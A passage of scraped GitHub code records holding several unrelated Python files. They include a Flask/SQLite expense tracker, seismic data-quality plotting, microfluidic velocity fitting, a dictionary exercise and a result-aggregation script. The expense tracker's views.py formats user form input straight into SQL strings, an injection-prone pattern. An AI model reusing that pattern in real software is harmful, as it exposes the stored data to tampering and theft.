removing.....\")\r\nUser.showUsers()\r\n","repo_name":"Trent-K/User_Management_System","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4205490231","text":"from flask import render_template, redirect, request\nfrom app import app\n\nimport sqlite3 as db\n\n\ndef init():\n conn = db.connect(\"expenses.db\")\n cur = conn.cursor()\n sql = '''\n create table if not exists expenses(\n date date,\n category string,\n amount real,\n additional_comments string\n )\n '''\n cur.execute(sql)\n conn.commit()\n\n\ndef insert(date, category, price, comm):\n conn = db.connect(\"expenses.db\")\n cur = conn.cursor()\n\n sql= '''\n INSERT INTO expenses VALUES('{}','{}',{},'{}')\n '''.format(date, category, price, comm)\n\n cur.execute(sql)\n conn.commit()\n\ndef view_all():\n conn = db.connect(\"expenses.db\")\n cur = conn.cursor()\n sql1 = '''\n select * from expenses\n '''\n cur.execute(sql1)\n results = cur.fetchall()\n #results = pd.read_sql_query(sql1,conn)\n #print(results)\n sql2 = '''\n select sum(amount) from expenses\n '''\n cur.execute(sql2)\n total = cur.fetchone()\n print(\"\\n Total expense = {}\".format(total[0]))\n return results, total[0]\n\ndef init_values():\n conn = db.connect(\"expenses.db\")\n cur = conn.cursor()\n sql = '''\n select * from expenses\n '''\n cur.execute(sql)\n results = cur.fetchall()\n \n if len(results)==0:\n insert(\"2021-06-19\", \"rent\" , 20000, \"\")\n insert(\"2021-06-19\" , \"transport\", 2345,\"\")\n insert(\"2021-06-19\", \"groceries\" , 3450,\"\")\n insert(\"2021-06-19\" , \"home and utilities\" , 1247 , \"\")\n insert(\"2021-06-19\", \"insurance\" , 125000, \"\")\n insert(\"2021-06-19\" , \"bills and emi\" , 11230 , \"\")\n insert(\"2021-06-19\" , \"education\" , 150000,\"\")\n insert(\"2021-06-19\" , \"health and personal care\" , 6700 , \"\")\n insert(\"2021-05-23\", \"rent\" , 15000, \"\")\n insert(\"2021-05-19\" , \"transport\", 1345,\"\")\n insert(\"2021-05-25\", \"groceries\" , 2324,\"\")\n insert(\"2021-05-14\" , \"home and utilities\" , 908 , \"\")\n insert(\"2021-05-11\", \"insurance\" , 150000, \"\")\n insert(\"2021-05-18\" , \"bills and emi\" , 4560 , \"\")\n insert(\"2021-05-12\" , \"education\" , 29000,\"\")\n insert(\"2021-05-20\" , \"health and personal care\" , 3700 , \"\")\n insert(\"2020-02-14\", \"rent\" , 20000, \"\")\n insert(\"2020-08-25\" , \"transport\", 2345,\"\")\n insert(\"2020-05-07\", \"groceries\" , 3450,\"\")\n insert(\"2020-04-02\" , \"home and utilities\" , 1247 , \"\")\n insert(\"2020-08-26\", \"insurance\" , 125000, \"\")\n insert(\"2020-07-22\" , \"bills and emi\" , 11230 , \"\")\n insert(\"2020-09-13\" , \"education\" , 150000,\"\")\n insert(\"2020-01-25 \" , \"health and personal care\" , 6700 , \"\")\n insert(\"2020-05-14\" , \"health and personal care\" , 3400 , \"\")\n conn.commit()\n\ndef delete(date, price):\n conn = db.connect(\"expenses.db\")\n cur = conn.cursor()\n sql= '''\n DELETE from expenses where date = '{}'\n '''.format(date)\n\n cur.execute(sql)\n conn.commit()\n\ndef view_by_category(category):\n conn = db.connect(\"expenses.db\")\n cur = conn.cursor()\n sql1 = '''\n select * from expenses where category = '{}'\n '''.format(category)\n cur.execute(sql1)\n results = cur.fetchall()\n #results = pd.read_sql_query(sql1,conn)\n #print(results)\n sql2 = '''\n select sum(amount) from expenses\n '''\n cur.execute(sql2)\n total = cur.fetchone()\n print(\"\\n Total expense = {}\".format(total[0]))\n sql3 = '''\n select sum(amount) from expenses where category = '{}'\n '''.format(category)\n cur.execute(sql3)\n total_category = cur.fetchone()\n print(\"\\n Total expense in the category = {}\".format(total_category[0]))\n return results, total[0], total_category[0]\n\ndef view_by_date(date1,date2):\n conn = db.connect(\"expenses.db\")\n cur = conn.cursor()\n sql1 = '''\n select * from expenses where date between '{}' and '{}'\n '''.format(date1, date2)\n cur.execute(sql1)\n results = cur.fetchall()\n #results = pd.read_sql_query(sql1,conn)\n #print(results)\n sql2 = '''\n select sum(amount) from expenses\n '''\n cur.execute(sql2)\n total = cur.fetchone()\n print(\"\\n Total expense = {}\".format(total[0]))\n sql3 = '''\n select sum(amount) from expenses where date between '{}' and '{}'\n '''.format(date1, date2)\n cur.execute(sql3)\n total_category = cur.fetchone()\n print(\"\\n Total expense in between these dates = {}\".format(total_category[0]))\n return results , total[0], total_category[0]\n\n\ndef row_count():\n conn = db.connect(\"expenses.db\")\n cur = conn.cursor()\n sql = '''\n select * from expenses\n '''\n cur.execute(sql)\n results = cur.fetchall()\n return len(results)\n\n@app.route('/')\n@app.route('/home')\ndef home():\n return render_template(\"home.html\")\n\n@app.route('/new',methods = ['GET' , 'POST'])\ndef new():\n return render_template(\"form.html\")\n\n@app.route ('/submit' , methods = ['GET' , 'POST']) \ndef submit():\n date = request.form['date']\n category = request.form['category']\n amount = request.form['amount']\n comment = request.form['comment']\n old_row = row_count()\n insert(date,category,amount,comment)\n new_row = row_count()\n if new_row - old_row ==1:\n message = \"Entry successful\"\n else:\n message = \"Entry unsuccessful. Please Try again!\"\n\n return render_template(\"action_page.html\" ,\n date = date , \n category = category,\n amount = amount,\n message = message)\n\n@app.route(\"/view\", methods = ['GET' , 'POST'])\ndef view():\n return render_template(\"view_database.html\")\n\n\n@app.route(\"/view_c_or_d\", methods = ['GET' , 'POST'])\ndef view_c_or_d():\n view_by = request.form['view']\n if view_by == 'view all': return redirect(\"/view_all_results\")\n elif view_by==\"view by category\": return redirect(\"/view_category_choice\")\n else: return redirect(\"/view_date_choice\")\n\n\n@app.route(\"/view_all_results\" , methods = ['GET' , 'POST'])\ndef view_all_results():\n results , total = view_all()\n message = \"python3 graphs.py --view_by all\"\n return render_template(\"view_result_data.html\" , results = results , total = total,\\\n message = message)\n\n@app.route(\"/view_category_choice\" , methods = ['GET' , 'POST'])\ndef view_category_choice():\n return render_template(\"view_database.html\" ,opt=2)\n\n@app.route(\"/view_date_choice\" , methods = ['GET' , 'POST'])\ndef view_date_choice():\n return render_template(\"view_database.html\" ,opt=3)\n\n\n@app.route(\"/view_category_results\" , methods = ['GET' , 'POST'])\ndef view_category_results(): \n category = request.form['view_category']\n message = \"python3 graphs.py --view_by category --category '\" + category + \"'\"\n results , total , total_c = view_by_category(category)\n return render_template(\"view_result_data.html\" , results = results , total = total, \n total_c = total_c, message = message)\n\n@app.route(\"/view_date_results\" , methods = ['GET' , 'POST'])\ndef view_date_results():\n date1 = request.form['from']\n date2 = request.form['to']\n message = \"python3 graphs.py --view_by date --from_date \" + date1 + \" --to_date \" +date2\n results , total , total_c = view_by_date(date1, date2)\n return render_template(\"view_result_data.html\" , results = results , total = total, \n total_c = total_c , message = message)\n","repo_name":"tanmaygoyal258/Expense-Tracker--Lambda","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34884361772","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\n\ndef plotlistdiff(total,gauss,gauss_exv,gauss_ixv,fname):\n start, end = total[0][0],total[-1][1] \n from gwpy.segments import DataQualityFlag\n gauss = DataQualityFlag(name='Gaussian ({0})'.format(len(gauss)),\n active=gauss,\n known=[(start,end)])\n gauss_exv = DataQualityFlag(name='Gauss_seis1 ({0})'.format(len(gauss_exv)),\n active=gauss_exv,\n known=[(start,end)])\n gauss_ixv = DataQualityFlag(name='Gauss_seis2 ({0})'.format(len(gauss_ixv)),\n active=gauss_ixv,known=[(start,end)])\n total = DataQualityFlag(name='Total ({0})'.format(len(total)),\n active=total,known=[(start,end)])\n args = gauss,gauss_ixv,gauss_exv,total\n start = args[0].known[0].start\n end = args[0].known[0].end\n plot = args[0].plot(figsize=(14,5),epoch=start,xlim=(start,end))\n ax = plot.gca()\n for data in args[1:]:\n ax.plot(data,label=data.name)\n ax.set_xlim(start,end)\n print(fname)\n plt.title(fname)\n plt.savefig(fname)\n \n \ndef plotpi(gauss,nonegauss,lack,fname):\n data = [len(gauss),len(nonegauss),len(lack)]\n label = ['Gaussian','Non-Gaussian','Lack of Data']\n fig,ax=plt.subplots(1,1,figsize=(7,3))\n wedges,texts,autotexts = ax.pie(\n data,startangle=90,counterclock=False,\n wedgeprops={'linewidth':1, 'edgecolor':\"black\"},\n autopct=\"%1.1f%%\",textprops=dict(color=\"w\"),colors=['g','y','red'])\n ax.legend(wedges, label,title=\"Conditions of the \\nData Segments\",\n loc=\"center left\",bbox_to_anchor=(1, 0, 0.5, 1))\n plt.setp(autotexts, size=12, weight=\"bold\")\n plt.title(fname)\n print(fname)\n plt.savefig(fname)\n plt.close()\n\n \n \ndef plotlist(total,gauss,nonegauss,lack,fname):\n start, end = total[0][0],total[-1][1]\n from gwpy.segments import DataQualityFlag\n gauss = DataQualityFlag(name='Gaussian ({0})'.format(len(gauss)),\n active=gauss,\n known=[(start,end)])\n lack = DataQualityFlag(name='Lack of Data ({0})'.format(len(lack)),\n active=lack,\n known=[(start,end)])\n nonegauss = DataQualityFlag(name='Non-Gaussian ({0})'.format(len(nonegauss)),\n active=nonegauss,known=[(start,end)])\n total = DataQualityFlag(name='Total ({0})'.format(len(total)),\n active=total,known=[(start,end)])\n args = gauss,nonegauss,lack,total\n start = args[0].known[0].start\n end = args[0].known[0].end\n plot = args[0].plot(figsize=(14,5),epoch=start,xlim=(start,end))\n ax = plot.gca()\n for data in args[1:]:\n ax.plot(data,label=data.name)\n ax.set_xlim(start,end)\n print(fname)\n plt.title(fname)\n plt.savefig(fname)\n\n \n\nfrom dataquality.dataquality import DataQuality\nstart,end = 1211817600, 1245372032\n\n\n# EXV-IXV differential\nfmt_2seis_total = 'select {2}.startgps,{2}.endgps '+\\\n 'from {2} INNER JOIN {3} '+\\\n 'ON ({2}.startgps ={3}.startgps) '+\\\n 'WHERE ({2}.startgps>={0} and {2}.endgps<={1})'\nfmt_2seis_lack = 'select {2}.startgps,{2}.endgps '+\\\n 'from {2} INNER JOIN {3} '+\\\n 'ON ({2}.startgps ={3}.startgps) '+\\\n 'WHERE (({2}.flag=2 and {3}.flag=2) or ({2}.flag=4 and {3}.flag=4 ))'+\\\n ' and ({2}.startgps>={0} and {2}.endgps<={1})' \nfmt_2seis = 'select {2}.startgps,{2}.endgps '+\\\n 'from {2} INNER JOIN {3} '+\\\n 'ON ({2}.startgps ={3}.startgps) '+\\\n 'WHERE ({2}.flag={4} and {3}.flag={4} )'+\\\n ' and ({2}.startgps>={0} and {2}.endgps<={1})'\n\n#\nfmt_total = 'select startgps,endgps from {2} WHERE ' +\\\n '(startgps>={0} and endgps<={1})'\nfmt_lack = 'select startgps,endgps from {2} WHERE (flag=2 or flag=4) and' +\\\n '(startgps>={0} and endgps<={1})'\nfmt_gauss = 'select startgps,endgps from {2} WHERE flag=0 and ' +\\\n '(startgps>={0} and endgps<={1})'\nfmt_nonegauss = 'select startgps,endgps from {2} WHERE flag=8 and ' +\\\n '(startgps>={0} and endgps<={1})'\n\n \nseislist = ['EXV_SEIS','IXV_SEIS'],['IXV_SEIS','IXVTEST_SEIS']\nfor seis1,seis2 in seislist:\n with DataQuality('./dataquality/dqflag.db') as db:\n #\n total = db.ask(fmt_2seis_total.format(start,end,seis1,seis2))\n gauss = db.ask(fmt_2seis.format(start,end,seis1,seis2,0))\n gauss_exv = db.ask(fmt_gauss.format(start,end,seis1))\n gauss_ixv = db.ask(fmt_gauss.format(start,end,seis2)) \n #\n fname = './results/segmentlist_{0}-{1}.png'.format(seis1,seis2) \n plotlistdiff(total,gauss,gauss_exv,gauss_ixv,fname) \n \n\n#\nseislist = ['EXV_SEIS','IXV_SEIS','IXVTEST_SEIS','MCE_SEIS','MCF_SEIS','BS_SEIS']\nfor seis in seislist:\n with DataQuality('./dataquality/dqflag.db') as db:\n #\n total = db.ask(fmt_total.format(start,end,seis))\n gauss = db.ask(fmt_gauss.format(start,end,seis))\n nonegauss = db.ask(fmt_nonegauss.format(start,end,seis))\n lack = db.ask(fmt_lack.format(start,end,seis))\n #\n fname = './results/segmentpi_{0}.png'.format(seis) \n plotpi(gauss,nonegauss,lack,fname)\n fname = './results/segmentlist_{0}.png'.format(seis) \n plotlist(total,gauss,nonegauss,lack,fname) \n","repo_name":"MiyoKouseki/kagra-gif","sub_path":"ugm/seismicnoise/main2_plotSegments.py","file_name":"main2_plotSegments.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"19135423317","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom deformationcytometer.evaluation.helper_functions import getConfig, getData, load_all_data, plotBinnedData\nfrom pathlib import Path\nimport pandas as pd\n#data1 = np.loadtxt(r\"\\\\131.188.117.96\\biophysDS\\emirzahossein\\microfluidic cell rhemeter data\\microscope_1\\september_2020\\2020_09_15_alginate2%_NIH_tanktreading_1\\2\\2020_09_15_10_35_15\\speeds.txt\")\n\nfrom deformationcytometer.includes.includes import getInputFile\nfrom deformationcytometer.evaluation.helper_functions import getConfig, getData, getVelocity, correctCenter\nfrom deformationcytometer.evaluation.helper_functions import fit_func_velocity\n\ndef removeNan(x, y):\n indices = ~np.isnan(x) & ~np.isnan(y)\n return x[indices], y[indices]\n\ndef getXY(pressure):\n data, config = load_all_data(\n rf\"\\\\131.188.117.96\\biophysDS\\emirzahossein\\microfluidic cell rhemeter data\\microscope_1\\september_2020\\2020_09_16_alginate2%_NIH_tanktreading\\1\\*_result.txt\",\n pressure=pressure)\n x = np.abs(data.rp) * 1e-6\n y = data.velocity * 1e-3\n return removeNan(x, y)\n\ndata, config = load_all_data(rf\"\\\\131.188.117.96\\biophysDS\\emirzahossein\\microfluidic cell rhemeter data\\microscope_1\\september_2020\\2020_09_16_alginate2%_NIH_tanktreading\\1\\*_result.txt\", pressure=3)\n\ndata = data[np.abs(data.velocity-data.velocity_fitted) < 1.5]\n\nplt.subplot(121)\nplt.plot(data.rp, data.velocity, \"o\")\nvel = fit_func_velocity(config)\ndx = 1e-6\nx = np.arange(-config[\"channel_width_m\"]/2, config[\"channel_width_m\"]/2, dx)\nv = vel(x*1e6)*1e-3\nplt.plot(x*1e6, v*1e3, \"k--\")\nplt.axhline(0, color=\"k\", lw=0.8)\nplt.xlabel(\"channel position (µm)\")\nplt.ylabel(\"velocity (mm/s)\")\n\nplt.subplot(122)\ngrad = np.diff(v)/np.diff(x)# * 1e3\n#plt.plot(data.rp, data.velocity_gradient, \"o\")\nplt.plot((x[:-1]+0.5*np.diff(x))*1e6, grad, \"k--\")\nplt.xlabel(\"channel position (µm)\")\nplt.ylabel(\"share rate $\\dot \\gamma$ (1/s)\")\n#plt.plot(data.rp*1e-6, getVelGrad(data.rp), \"s\")\n#plt.plot(x[:-1]+0.5*np.diff(x), grad, \"-+\")\n\nplt.show()\n\nplt.clf()\nplt.subplot(121)\nx = np.abs(data.rp)*1e-6\ny = data.velocity*1e-3\n#plt.plot(x, y, \"o\")\n\nif 1: # Euler\n H = 200e-6\n W = 200e-6\n n = np.arange(1, 99, 2)[:, None]\n tau = 1 / 20\n alpha = 0.67\n eta0 = 3.65\n P = 3 * 100000\n L = 58.5e-3\n pi = np.pi\n\n x1, y1 = getXY(1)\n x2, y2 = getXY(2)\n x3, y3 = getXY(3)\n\n def getVelocity(y, eta0, alpha, tau, P, W, H, L):\n def euler(t, x0, y0, f):\n x = np.zeros_like(t)\n y = np.zeros_like(t)\n x[0] = x0\n y[0] = y0\n dt = np.diff(t)\n for i, ti in enumerate(t[:-1]):\n y[i + 1] = f(ti, x[i])\n x[i + 1] = x[i] + y[i + 1] * dt[i]\n return t, x, y\n\n def getVDot(y, v):\n return 1 / tau * (np.abs(v * eta0 / getBeta(y) - 1)) ** (1 / alpha)\n\n def getBeta(y):\n return -(4 * (H ** 2) * P) / (L * (pi ** 3)) * np.sum(\n (-1) ** ((n - 1) / 2) / (n ** 3) * (1 - np.cosh((n * pi * y) / H) / np.cosh((n * pi * W) / (2 * H))),\n axis=0)\n\n t, v, vdot = euler(y, getBeta(0)/eta0, 0, getVDot)\n return t, -v, vdot\n\n import scipy.interpolate\n\n if 0:\n def getCostP(i, eta0, alpha, tau, W, H):\n yy = np.arange(0, H / 2, 1e-6) # [:100]\n t, v, vdot = getVelocity(yy, eta0, alpha, tau, i*1e5, W, H, L)\n return np.sum(np.abs(scipy.interpolate.interp1d(t, v)(xl[i])-yl[i]))\n\n def getCost(p):\n print(p)\n return getCostP(1, p[0], p[3], p[4], p[5], p[5]) \\\n + getCostP(2, p[1], p[3], p[4], p[5], p[5]) \\\n + getCostP(3, p[2], p[3], p[4], p[5], p[5])\n\n res = scipy.optimize.minimize(getCost, [eta0, eta0, eta0, alpha, tau, W], bounds=[(0, None), (0, None), (0, None), (0, 1), (0, None), (0, None)])\n\n def curve(y, eta0, alpha, tau, W2):\n #W, H = W2, W2\n yy = np.arange(0, H / 2, 0.1e-6) # [:100]\n t, v, vdot = getVelocity(yy, eta0, alpha, tau, P, W, H, L)\n return scipy.interpolate.interp1d(t, v)(y)\n\n\n def curve2(y):\n #W, H = W2, W2\n yy = np.arange(0, H / 2, 0.1e-6) # [:100]\n t, v, vdot = getVelocity(yy, eta0, alpha, tau, P, W, H, L)\n return scipy.interpolate.interp1d(t, v)(y), scipy.interpolate.interp1d(t, vdot)(y)\n\n\n W = 190e-6\n H = 190e-6\n eta0 = 0.6\n alpha = 0.7\n tau = 1/2000\n xl = [0,x1, x2, x3]\n yl = [0,y1, y2, y3]\n for i in [1,2,3]:\n P = i*1e5\n p, popt = scipy.optimize.curve_fit(curve, xl[i], yl[i], [eta0, alpha, tau, W])\n print(i, p)\n\n eta0, alpha, tau, W2 = p\n yy = np.arange(0, W / 2, 0.1e-6) # [:100]\n plt.plot(xl[i], yl[i], \"o\")\n t, v, vdot = getVelocity(yy, eta0, alpha, tau, P, W, W, L)\n plt.plot(t, v, \"-\")\n\n p, popt = scipy.optimize.curve_fit(curve, x3, y3, [eta0, alpha, tau, W])\n\n plt.clf()\n plt.subplot(121)\n #plt.plot(x1, y1, \"o\")\n #plt.plot(x2, y2, \"o\")\n plt.plot(x3, y3, \"o\")\n eta0, alpha, tau, W = p\n yy = np.arange(0, W / 2, 0.1e-6) # [:100]\n if 0:\n t, v, vdot = getVelocity(yy, eta0, alpha, tau, 1e5, W, W, L)\n plt.plot(t, v, \"-\")\n\n t, v, vdot = getVelocity(yy, eta0, alpha, tau, 2e5, W, W, L)\n plt.plot(t, v, \"-\")\n\n t, v, vdot = getVelocity(yy, eta0, alpha, tau, 3e5, W, W, L)\n plt.plot(t, v, \"-\")\n\n import matplotlib.ticker as ticker\n plt.gca().xaxis.set_major_formatter(ticker.FuncFormatter(lambda x, pos: '{0:g}'.format(x * 1e6)))\n plt.subplot(122)\n\n #tau = 1 / 20\n #alpha = 0.67\n #eta0 = 3.65\n plt.plot(t, eta0/(1+(tau*vdot)**alpha))\n plt.loglog([], [])\n import matplotlib.ticker as ticker\n plt.gca().xaxis.set_major_formatter(ticker.FuncFormatter(lambda x, pos: '{0:g}'.format(x * 1e6)))\n plt.show()\n\nif 0:\n import scipy.optimize\n\n def curve(x, x0, a1, a2):\n return x0 * (1 - (a1*(x/95e-6)**2 - (a2*(x/95e-6))**4))\n\n def derivative(x, x0, d1, a1, d2, a2):\n return -((d1 * (a1 * x) ** d1 + d2*(a2*x) ** d2) * x0) / x\n\n\n #def curve(x, x0, delta, delta2):\n # return x0 * ((2) - (x)**delta - (x)**delta2)\n\n p, popt = scipy.optimize.curve_fit(curve, x, y, [25e-3, 1, 1/95e-6, 2, 1/95e-6])\n print(p)\n xx = np.linspace(0, 95e-6, 100)\n plt.plot(xx, curve(xx, *p))\n\n plt.subplot(122)\n yy = np.diff(curve(xx, *p)) / np.diff(xx)\n plt.plot(xx[:-1]+np.diff(xx)/2, yy)\n plt.plot(xx, derivative(xx, *p))\n\n plt.plot((x[:-1]+0.5*np.diff(x)), grad, \"k--\")\n\n plt.plot(xx, curve(xx, *[25e-3, 1, 1/95e-6, 2, 1/95e-6]))\n\n\n def stressfunc(R, P, L, H): # imputs (radial position and pressure)\n G = P / L # pressure gradient\n pre_factor = (4 * (H ** 2) * G) / np.pi ** 3\n # sum only over odd numbers\n n = np.arange(1, 100, 2)[None, :]\n u_primy = pre_factor * np.sum(((-1) ** ((n - 1) / 2)) * (np.pi / ((n ** 2) * H)) \\\n * (np.sinh((n * np.pi * R[:, None]) / H) / np.cosh(n * np.pi / 2)), axis=1)\n\n stress = np.abs(u_primy)\n return stress\n\n #def eta():\n # return eta0 / (1-)","repo_name":"fabrylab/Deformation_Cytometer","sub_path":"figures/panel3_tanktreading/velocity_profile.py","file_name":"velocity_profile.py","file_ext":"py","file_size_in_byte":7154,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"12992108731","text":"\n# 1. Manipulasi sebuah bilangan nilai dictionary\n# diketahui ---> a = {1,2,4,6,8,9,10,5,3,7}\n# ketentuan ---> a. urutkan bilangan dari terkecil hingga terbesar\n# ---> a = {1,2,3,4,5,6,7,8,9,10}\n# b. cari bilagan terkecil ---> 1\n# c. cari bilagan terbesar ---> 10\n\n# 2. periksa bilangan jika terdapat didalam sebuah nilai dictionary\n# diketahui ---> d = {1: 10, 2: 20, 3: 30, 4: 40, 5: 50, 6: 60}\n# Ketentuan ---> a. jika di input(9), maka hasil False (*check if exist)\n# b. kelompokan bilangan ganjil ---> d = {1: 10, 3: 30, 5: 50}\n# c. kelompokan bilangan genap ---> d = {2: 20, 4: 40, 6: 60}\n\n# 3. Buatlah sebuah nilai dictionary yang menghasilkan data dari sebuah rumusan berikut :\n# diketahui ---> jika nilai input diberikan adalah 5\n# ketentuan ---> tentukan rumusan/logic program\n# hasil print ---> a. ---> d = {1: 10, 2: 20, 3: 30, 4: 40, 5: 50}\n# hasil print ---> b. ---> d = {1: 13, 2: 25, 3: 37, 4: 49, 5: 61}\n\n#--------------------------------------------------------------------------------------------#\n\na = [1,2,4,6,8,9,10,5,3,7]\n\nb = sorted(a, reverse=False)\nprint(\"Urutan bilangan dari terkecil hingga terbesar a = \",b)\n\nc = sorted(a, reverse=True)\nprint(\"Urutan bilangan dari terbesar hingga terkecil a = \",c)\n\nprint(\"bilangan terkecil = \",min(a))\nprint(\"bilangan terbesar = \",max(a))\n\n#--------------------------------------------------------------------------------------------#\n\n# Dictionary Comprehension\nd = {1: 10, 2: 20, 3: 30, 4: 40, 5: 50, 6: 60}\n\nganjil = dict(\n filter(lambda e:e[0] % 2 == 1, d.items()) \n )\n \ngenap = dict(\n filter(lambda e:e[0] % 2 == 0, d.items()) \n ) \n\nprint(\"Kelompok bilangan ganjil d = \",ganjil)\nprint(\"Kelompok bilangan genap d = \",genap)\n\n#--------------------------------------------------------------------------------------------#\n\nsquares = {}\nangka=int(input(\"\\nMasukan Angka : \"))\n\nfor x in range(angka):\n squares[x] = x*10\n \nprint(\"Kelompok squares A = \",squares)\n\nincr = 3\nfor x in range(angka):\n squares[x] = ((x+1)*10) + incr\n incr = (incr + 2)\n \nprint(\"Kelompok squares B = \",squares) \n\n\n#--------------------------------------------------------------------------------------------#\n","repo_name":"rahmattri87/latihanPython","sub_path":"studi_kasus_dictionary.py","file_name":"studi_kasus_dictionary.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"70974352391","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nA computer that can build the question.\n\nNot just any question:\nNo one really cares about how many Vogons\nwould it take to change a lightbulb?\n\nWe need a computer that can build the\nULTIMATE QUESTION. This computer will be called DEEP THOUGHT\n\"\"\"\n\nTHE_ANSWER_TO_EVERYTHING = 42\nINFINITE_IMPROBABILITY = 'browning motion'\n","repo_name":"leov2000/is210-week-03-warmup-19","sub_path":"task_09.py","file_name":"task_09.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"69901049673","text":"import matplotlib.pyplot as plt\nimport os\nimport re\nimport ReadConfig\nimport pandas as pd\nfrom wordcloud import WordCloud\n\nconfig = ReadConfig.get_config()\nfile_path = config['storage_location']\n\ndef read_csv_to_df(file, header):\n \"\"\"\n Read csv file without header and add a custom header.\n :param:\n file: path to file and filename\n header: custom list of headers\n :return:\n df: resulting dataframe\n \"\"\"\n #headers = header\n df = pd.read_csv(file, delimiter= '|', names = header) # , header = None\n return df\n\n\ndef concat_df(file_list):\n \"\"\"\n Concatenate all dataframes that belong to one annotation type and run.\n :param:\n file_list: list with all dataframes that belong to an annotation type and run\n :return:\n new_df: concatenated dataframe\n \"\"\"\n old_df = file_list[0]\n for df in file_list[1:]:\n new_df = pd.concat([old_df, df])\n old_df = new_df\n return new_df\n\ndef visualise_most_abundant_terms(GO_des_df, run_id):\n \"\"\"\n Create a wordcloud of the most abundant terms. No filtering is applied to the terms.\n :param:\n GO_des_df: dataframe with summed counts for each GO description\n run_id: run identifier\n \"\"\"\n # make wordcloud\n terms = GO_des_df.GO_description.to_list()\n amount = GO_des_df.counts.to_list()\n cleaned_terms = [term.split('[')[0] for term in terms]\n final_terms = []\n for term, count in zip(cleaned_terms, amount):\n t = term * count\n final_terms.append(t)\n\n final_terms = ''.join(final_terms)\n\n # Create the wordcloud object\n wordcloud = WordCloud(width=480, height=480, margin=0).generate(final_terms)\n\n # Display the generated image:\n plt.imshow(wordcloud, interpolation='bilinear')\n plt.axis(\"off\")\n plt.margins(x=0, y=0)\n pic_name = file_path + run_id + '_wordcloud.png'\n print(pic_name)\n plt.savefig(pic_name)\n\n\ndef combine_results(run_id):\n \"\"\"\n Given a run identifier collect results for this run. Cocatenate the temporary files created per client and peon\n into a big file. Aggregate the counts of same Annotation identifiers. Write the aggregated dataframes to final \n result count files and produce visualisations, which are saved to file as well.\n :param:\n run_id: identifier of the run to be processed\n \"\"\"\n GO_num_pat = r'\\S*GO_number\\S*.csv'\n GO_des_pat = r'\\S*GO_description\\S*.csv'\n EC_num_pat = r'\\S*EC_number\\S*.csv'\n\n # create lists to collect dataframes from files in\n GO_num_file_list = []\n GO_des_file_list = []\n EC_num_file_list = []\n\n # create dataframes from files found with regex and append to dataframe lists\n path = file_path + run_id + '/'\n for file in os.listdir(path):\n if re.match(GO_num_pat, file):\n header = ['GO_number', 'counts']\n path_to_file = path + file\n df = read_csv_to_df(path_to_file, header)\n GO_num_file_list.append(df)\n if re.match(GO_des_pat, file):\n path_to_file = path + file\n header = ['GO_description', 'counts']\n df = read_csv_to_df(path_to_file, header)\n GO_des_file_list.append(df)\n if re.match(EC_num_pat, file):\n header = ['EC_number', 'counts']\n path_to_file = path + file\n df = read_csv_to_df(path_to_file, header)\n EC_num_file_list.append(df)\n \n # concatenate all files into one dataframe per result type\n GO_num_new_df = concat_df(file_list = GO_num_file_list)\n GO_des_new_df = concat_df(file_list = GO_des_file_list)\n EC_num_new_df = concat_df(file_list = EC_num_file_list)\n \n # aggregate concatenated dataframes to final dataframes\n final_GO_num_df = GO_num_new_df.groupby('GO_number').sum().reset_index()\n final_GO_des_df = GO_des_new_df.groupby('GO_description').sum().reset_index()\n final_EC_num_df = EC_num_new_df.groupby('EC_number').sum().reset_index()\n print('GO_numbers condensed', len(final_GO_num_df.index))\n print('GO_descriptions condensed', len(final_GO_des_df.index))\n print('EC_numbers condensed', len(final_EC_num_df.index))\n print('Total GO number counts', final_GO_num_df.counts.sum())\n print('Total GO description counts', final_GO_des_df.counts.sum())\n print('Total EC number counts', final_EC_num_df.counts.sum())\n\n # create file name without extension\n GO_num_file_name = f'{file_path}{run_id}_final_GO_number_counts'\n GO_des_file_name = f'{file_path}{run_id}_final_GO_description_counts'\n EC_num_file_name = f'{file_path}{run_id}_final_EC_number_counts'\n\n # write final dataframes to csv file and produce barplots\n final_GO_num_df.to_csv(f'{GO_num_file_name}.csv', index = False)\n final_GO_des_df.to_csv(f'{GO_des_file_name}.csv', index = False)\n final_EC_num_df.to_csv(f'{EC_num_file_name}.csv', index = False)\n final_GO_num_df.sort_values(['counts'], ascending=False).head(20).to_csv(f'{GO_num_file_name}_top_20.csv', index = False)\n final_EC_num_df.sort_values(['counts'], ascending=False).head(20).to_csv(f'{EC_num_file_name}_top_20.csv', index = False)\n\n # visualise the most abundant GO terms\n visualise_most_abundant_terms(final_GO_des_df, run_id)\n\n\nif __name__ == '__main__':\n run_ids = ['run_1', 'run_2']\n for run_id in run_ids:\n combine_results(run_id)\n","repo_name":"ChiaraBecht/Programming3","sub_path":"Assignment6/produce_final_results.py","file_name":"produce_final_results.py","file_ext":"py","file_size_in_byte":5359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21679253995","text":"def solution(numbers):\n answer = ''\n for idx, number in enumerate(numbers):\n numbers[idx] = [str(number) * 3, len(str(number))]\n numbers.sort(reverse = True)\n for number in numbers:\n num, length = number[0], number[1]\n answer += num[:length]\n return str(int(answer))\n\ndef solution2(numbers):\n answer = ''\n for idx, number in enumerate(numbers):\n if number == 0:\n zero_cnt += 1\n continue\n arr = list(map(int, str(number)))\n real = len(arr)\n while len(arr) < 4:\n arr.append(arr[0])\n numbers[idx] = arr + [real]\n numbers.sort(key = lambda x : (-x[0], -x[1], -x[2], -x[3], x[4]))\n\n for number in numbers:\n i = 0\n while i < number[-1]:\n answer += 